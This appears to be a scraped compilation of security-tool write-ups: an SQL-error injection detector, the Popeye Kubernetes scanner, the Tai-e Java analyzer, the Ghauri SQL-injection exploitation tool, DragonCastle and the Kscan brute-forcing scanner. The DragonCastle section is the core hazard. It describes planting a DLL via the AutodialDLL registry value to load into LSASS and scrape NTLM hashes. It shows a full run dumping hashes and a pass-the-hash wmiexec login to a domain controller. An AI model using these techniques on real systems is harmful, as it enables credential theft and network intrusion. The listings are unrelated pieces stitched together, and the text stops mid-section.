usage: sqlidetector.py [-h] -f FILE [-w WORKERS] [-p PROXY] [-t TIMEOUT] [-o OUTPUT]
A simple tool to detect SQL errors
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File of the urls
-w WORKERS, --workers WORKERS Number of threads
-p PROXY, --proxy PROXY Proxy host
-t TIMEOUT, --timeout TIMEOUT Connection timeout
-o OUTPUT, --output OUTPUT Output file

# python3 sqlidetector.py -f urls.txt -w 50 -o output.txt -t 10

BurpBounty Module

I've created a BurpBounty profile that uses the same payloads and injects them at multiple positions, like

  • Parameter name
  • Parameter value
  • Headers
  • Paths

I think it's more effective and will be helpful for POST requests, which you can't test using the Python script.

How does it test the parameter?

What's the difference between this tool and any other one? If we have a link like https://example.com?file=aykalam&username=eslam3kl, we have 2 parameters, so it creates 2 possible vulnerable URLs.

  1. For every payload, it builds one candidate URL per parameter, like the following
https://example.com?file=123'&username=eslam3kl
https://example.com?file=aykalam&username=123'
  2. It sends a request for every link and checks whether one of the error patterns matches the response using regex (see the sketch below).
  3. Any vulnerable link is saved to a separate file for every process.
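A rough sketch of that flow in Python is below. It is not the tool's actual code: the payload list is shortened and ERROR_PATTERNS stands in for the 152 regexes taken from sqlmap's errors.xml:

import re
import requests
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

PAYLOADS = ["'123", '"123', "`123"]  # shortened; the tool ships 14 payloads
ERROR_PATTERNS = [r"SQL syntax.*MySQL", r"PostgreSQL.*ERROR", r"ORA-\d{5}"]  # placeholders

def test_url(url: str) -> None:
    parsed = urlparse(url)
    params = dict(parse_qsl(parsed.query))
    for name in params:  # one candidate URL per parameter
        for payload in PAYLOADS:
            injected = {**params, name: payload}
            target = urlunparse(parsed._replace(query=urlencode(injected)))
            body = requests.get(target, timeout=10).text
            if any(re.search(pattern, body, re.I) for pattern in ERROR_PATTERNS):
                print(f"[+] possible error-based SQLi: {target}")

test_url("https://example.com?file=aykalam&username=eslam3kl")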

Upcoming updates

  • Output json option.
  • Adding proxy option.
  • Adding threads to increase the speed.
  • Adding progress bar.
  • Adding more payloads.
  • Adding BurpBounty Profile.
  • Inject the payloads in the parameter name itself.

If you want to contribute, feel free to do that. You're welcome :)

Thanks to

Thanks to Mohamed El-Khayat and Orwa for the amazing payloads and ideas. Follow them and you will learn more

https://twitter.com/Mohamed87Khayat
https://twitter.com/GodfatherOrwa

Stay in touch <3

LinkedIn | Blog | Twitter



Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans a live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed, not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resource over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a read-only tool; it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Linux using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following command in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses 256-color terminal mode. On *nix systems make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs against live clusters, inspecting Kubernetes resources and sanitizing them as they are in the wild!

Here is a list of some of the available sanitizers:

Resource (aliases): sanitizers performed

  • Node (no): conditions, i.e. not ready, out of mem/disk, network, pids, etc; pod tolerations referencing node taints; CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)
  • Namespace (ns): inactive; dead namespaces
  • Pod (po): pod status; container statuses; ServiceAccount presence; CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM); container image with no tags; container image using latest tag; resources request/limits presence; probes liveness/readiness presence; named ports and their references
  • Service (svc): endpoints presence; matching pods labels; named ports and their references
  • ServiceAccount (sa): unused, detects potentially unused SAs
  • Secrets (sec): unused, detects potentially unused secrets or associated keys
  • ConfigMap (cm): unused, detects potentially unused cm or associated keys
  • Deployment (dp, deploy): unused, pod template validation, resource utilization
  • StatefulSet (sts): unused, pod template validation, resource utilization
  • DaemonSet (ds): unused, pod template validation, resource utilization
  • PersistentVolume (pv): unused, check volume bound or volume error
  • PersistentVolumeClaim (pvc): unused, check bounded or volume mount error
  • HorizontalPodAutoscaler (hpa): unused, utilization, max burst checks
  • PodDisruptionBudget (pdb): unused, check minAvailable configuration
  • ClusterRole (cr): unused
  • ClusterRoleBinding (crb): unused
  • Role (ro): unused
  • RoleBinding (rb): unused
  • Ingress (ing): valid
  • NetworkPolicy (np): valid
  • PodSecurityPolicy (psp): valid

You can also see the full list of codes

Save the report

To save the Popeye report to a file, pass the --save flag to the command. By default it will create a temp directory and store the report there; the path of the temp directory is printed to STDOUT. If you need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follows the format sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. "sanitizer-mycluster-1594019782530851873.html"). If you need to specify the output file name for the report, you can pass the --output-file flag with the desired filename as parameter.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3-compatible object storage) by providing the flag --s3-bucket. As a parameter, provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory, provide the bucket parameter as bucket/path/to/report.

Under the hood, the AWS Go library is used, which handles the credential loading. For more information check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS S3 is not your bag, you can further define an S3-compatible storage (OVHcloud Object Storage, Minio, Google Cloud Storage, etc...) using s3-endpoint and s3-region like so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, the report is written to /tmp inside the container, which is then deleted when popeye exits, so you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting the POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format Description Default Credits
standard The full monty output iconized and colorized yes
jurassic No icons or color like it's 1979
yaml As YAML
html As HTML
json As JSON
junit For the Java melancholic
prometheus Dumps the report as Prometheus scrapable metrics dardanel
score Returns a single cluster sanitizer score value (0-100) kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBudgets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye "configless" to make sure you will recognize any new issues that may have arisen in your clusters...

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
  # Checks resources against reported metrics usage.
  # If over/under these thresholds a sanitization warning will be issued.
  # Your cluster must run a metrics-server for these to take place!
  allocations:
    cpu:
      underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
      overPercUtilization: 50   # Checks if cpu is over allocated by more than 50% at current load.
    memory:
      underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
      overPercUtilization: 50   # Checks if mem is over allocated by more than 50% usage at current load.

  # Excludes excludes certain resources from Popeye scans
  excludes:
    v1/pods:
      # In the monitoring namespace excludes all probes check on pod's containers.
      - name: rx:monitoring
        codes:
          - 102
      # Excludes all istio-proxy container scans for pods in the icx namespace.
      - name: rx:icx/.*
        containers:
          # Excludes istio init/sidecar container from scan!
          - istio-proxy
          - istio-init
    # ConfigMap sanitizer exclusions...
    v1/configmaps:
      # Excludes key must match the singular form of the resource.
      # For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
      - name: rx:fred.+\.v\d+
    # Namespace sanitizer exclusions...
    v1/namespaces:
      # Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
      - name: rx:kube
        codes:
          - 404
      # Exclude all istio* namespaces from being scanned.
      - name: rx:istio
    # Completely exclude horizontal pod autoscalers.
    autoscaling/v1/horizontalpodautoscalers:
      - name: rx:.*

  # Configure node resources.
  node:
    # Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
    limits:
      # CPU checks if current CPU utilization on a node is greater than 90%.
      cpu: 90
      # Memory checks if current Memory utilization on a node is greater than 80%.
      memory: 80

  # Configure pod resources
  pod:
    # Restarts check the restarts count and triggers a lint warning if above threshold.
    restarts: 3
    # Check container resource utilization in percent.
    # Issues a lint warning if above these thresholds.
    limits:
      cpu: 80
      memory: 75

  # Configure a list of allowed registries to pull images from
  registries:
    - quay.io
    - docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: popeye
  namespace: popeye
spec:
  schedule: "* */1 * * *" # Fire off Popeye once an hour
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: popeye
          restartPolicy: Never
          containers:
            - name: popeye
              image: derailed/popeye
              imagePullPolicy: IfNotPresent
              args:
                - -o
                - yaml
                - --force-exit-zero
                - "true"
              resources:
                limits:
                  cpu: 500m
                  memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: popeye
  namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: popeye
rules:
- apiGroups: [""]
  resources:
    - configmaps
    - deployments
    - endpoints
    - horizontalpodautoscalers
    - namespaces
    - nodes
    - persistentvolumes
    - persistentvolumeclaims
    - pods
    - secrets
    - serviceaccounts
    - services
    - statefulsets
  verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
  resources:
    - clusterroles
    - clusterrolebindings
    - roles
    - rolebindings
  verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
  resources:
    - pods
    - nodes
  verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: popeye
subjects:
- kind: ServiceAccount
  name: popeye
  namespace: popeye
roleRef:
  kind: ClusterRole
  name: popeye
  apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in terms of Sanitizer severity levels:

Level Jurassic Color Description
Ok OK Green Happy!
Info I BlueGreen FYI
Warn W Yellow Potential Issue
Error E Red Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when...

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: 太阿; pronunciation: [ˈtaɪə:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you might build the latest Tai-e yourself from the source code. This can be simply done via Gradle (be sure that Java 17 (or higher version) is available on your system). You just need to run command gradlew fatJar, and then the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you could find more information about Tai-e such as Setup in IntelliJ IDEA , Command-Line Options , and Development of New Analysis .

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to ghauri directory.
  • install requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will be able to access and run ghauri with a simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports following types of injection payloads:
    • Boolean based.
    • Error Based
    • Time Based
    • Stacked Queries
  • Supports SQL injection for the following DBMS.
    • MySQL
    • Microsoft SQL Server
    • PostgreSQL
    • Oracle
  • Supports following injection types.
    • GET/POST Based injections
    • Headers Based injections
    • Cookies Based injections
    • Multipart form data injections
    • JSON based injections
  • support proxy option --proxy.
  • supports parsing request from txt file: switch for that -r file.txt
  • supports limiting data extraction for dbs/tables/columns/dump: switch --start 1 --stop 2
  • added support for resuming of all phases.
  • added support for skip urlencoding switch: --skip-urlencode
  • added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1').
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value
-H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrieve entries from offset for dbs/tables/columns/dump
--stop Retrieve entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries


DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables the Remote Registry service to modify the AutodialDLL entry and starts/restarts the BITS service. Svchost loads our DLL, sets AutodialDLL back to its default value and performs an RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it searches the process memory to extract NTLM hashes and the key/IV.

The DllMain always returns FALSE so the processes don't keep it loaded.
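For a local, read-only illustration of the registry value being swapped, the snippet below queries the standard WinSock2 Parameters location. DragonCastle itself performs the modification remotely through the Remote Registry service; the default value mentioned in the comment is an assumption about a typical system:

import winreg

KEY = r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
    value, _ = winreg.QueryValueEx(key, "AutodialDLL")
    # Normally points at rasadhlp.dll; the technique repoints it at the planted DLL.
    print("Current AutodialDLL:", value)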


Caveats

It only works when RunAsPPL is not enabled. Also, I only added support to decrypt 3DES because I am lazy, but it should be easy to add code for AES. For the same reason, I only implemented support for the following Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid domain name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|โ‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernรกndez (@TheXC3LL)

References



Kscan - Simple Asset Mapping Tool


0 Disclaimer (The author did not participate in the XX action, don't trace it)

  • This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.

  • When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.

We reserve the right to pursue your legal responsibility if the above prohibited behavior is found.

If you have any illegal behavior in the process of using this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint responsibility.

Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.

Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this Agreement in any other express or implied manner shall be deemed that you have read and agreed to be bound by this Agreement.

1 Introduction

 _   __
|#| /#/ Lightweight Asset Mapping Tool by: kv2
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#|
|##| |#|___ |#| /###\ |##\|#|
|#.#\ \#####\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
|#| \#\\#####/ \#####/#/ \#\#| \#|

Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, obtaining as much port information as possible without sending extra packets. It can automatically brute-force services found in the scan results, and is the first open-source RDP brute-force tool written in Go.

2 Foreword

There are already many excellent tools for asset scanning, fingerprint identification and vulnerability detection, but Kscan takes a few different approaches.

  • Kscan accepts a variety of input formats, so there is no need to classify targets (IP, URL address, etc.) before use; every entry is recognized automatically. If the target is a URL address, the path is kept for detection; if it is only IP:PORT, protocol identification is attempted on that port first. Kscan currently supports three input methods (-t/--target, -f/--fofa, --spy).

  • Kscan does not simply map port numbers to common protocols for speed, nor does it detect only web assets. It favors accuracy and comprehensiveness, relying on high-accuracy protocol identification to provide a solid basis for subsequent application-layer identification.

  • Kscan does not stack independent modules that each fetch one piece of information (one module for titles, one for SMB information, and so on) and output separately. Instead it reports asset information per port: if the port protocol is HTTP, fingerprinting and title acquisition follow automatically; if the port protocol is RPC, it tries to obtain the host name, and so on.

3 Compilation Manual

Compiler Manual

4 Get started

Kscan currently has 3 ways to input targets

  • -t/--target can add the --check parameter to fingerprint only the specified target port, otherwise the target will be port scanned and fingerprinted
IP address: 114.114.114.114
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
  • --spy can add the --scan parameter to perform port scanning and fingerprinting on the surviving C segment, otherwise only the surviving network segment will be detected
[Empty]: will detect the IP address of the local machine and detect the B segment where the local IP is located
[all]: All private network addresses (192.168/172.32/10, etc.) will be probed
IP address: will detect the B segment where the specified IP address is located
  • -f/--fofa can add --check to verify the survivability of the retrieval results, and add the --scan parameter to perform port scanning and fingerprint identification on the retrieval results, otherwise only the fofa retrieval results will be returned
fofa search keywords: will directly return fofa search results

5 Instructions

